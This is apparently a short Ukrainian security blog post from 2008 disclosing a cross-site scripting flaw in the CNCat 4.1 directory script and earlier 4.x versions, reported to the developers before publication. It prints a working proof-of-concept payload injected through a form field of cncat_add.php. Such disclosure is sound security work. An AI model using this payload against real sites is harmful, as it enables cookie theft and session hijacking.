Уразливість в CNCat
20:05 20.10.200817.07.2008
Нещодавно, 15.07.2008, я знайшов Cross-Site Scripting уразливість в системі CNCat 4.1. Як раз коли перевіряв уразливості в попередніх версіях CNCat (2.0 та 2.1).
Детальна інформація про уразливість з’явиться пізніше. Спочатку повідомлю розробникам системи.
20.10.2008
XSS:
POST запит на сторінці http://site/cncat_add.php
</textarea><script>alert(document.cookie)</script>
В полі: Полное описание.
Уразливі CNCat 4.1 та попередні 4.x версії.